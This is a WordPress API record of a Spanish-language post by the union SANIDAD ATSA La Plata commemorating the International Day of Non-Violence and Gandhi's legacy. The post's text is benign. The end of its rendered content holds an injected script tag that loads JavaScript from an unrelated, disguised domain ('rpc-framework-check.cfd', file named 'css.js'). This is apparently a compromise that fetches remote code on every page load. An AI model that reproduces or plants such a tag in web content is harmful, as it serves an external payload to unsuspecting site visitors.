{"id":19441,"date":"2025-10-02T11:37:24","date_gmt":"2025-10-02T14:37:24","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=19441"},"modified":"2026-02-02T16:31:16","modified_gmt":"2026-02-02T19:31:16","slug":"dia-internacional-de-la-no-violencia","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/10\/dia-internacional-de-la-no-violencia\/","title":{"rendered":"D\u00eda Internacional de la No Violencia"},"content":{"rendered":"\n<p>\ud83d\udcc5Hoy conmemoramos el D\u00eda Internacional de la No Violencia, una fecha establecida por la Asamblea General de las Naciones Unidas (ONU) en<\/p>\n\n\n\n<p>honor al nacimiento de Mahatma Gandhi, l\u00edder inspirador de la independencia de la India y s\u00edmbolo universal de la resistencia pac\u00edfica. \ud83d\udd4a<\/p>\n\n\n\n<p>Nacido el 2 de octubre de 1869, Gandhi dedic\u00f3 su vida a promover la no violencia como herramienta poderosa para el cambio social, demostrando que la lucha por la justicia y la igualdad puede lograrse mediante el di\u00e1logo, la resistencia pac\u00edfica y el respeto mutuo.<\/p>\n\n\n\n<p>Su legado nos invita a reflexionar sobre la importancia de resolver conflictos sin recurrir a la violencia, fomentando la paz en nuestras comunidades y en el mundo.<\/p>\n\n\n\n<p>Desde SANIDAD ATSA La Plata nos sumamos a esta conmemoraci\u00f3n reafirmando nuestro compromiso con la defensa de los derechos de los trabajadores\/as, el respeto y la solidaridad como pilares fundamentales para construir una sociedad m\u00e1s justa y pac\u00edfica.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos<\/p>\n\n\n\n<p>#D\u00edaDeLaNoViolencia<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udcc5Hoy conmemoramos el D\u00eda Internacional de la No Violencia, una fecha establecida por la Asamblea&#8230;<\/p>\n","protected":false},"author":2,"featured_media":19442,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-19441","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=19441"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19441\/revisions"}],"predecessor-version":[{"id":20688,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/19441\/revisions\/20688"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/19442"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=19441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=19441"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=19441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}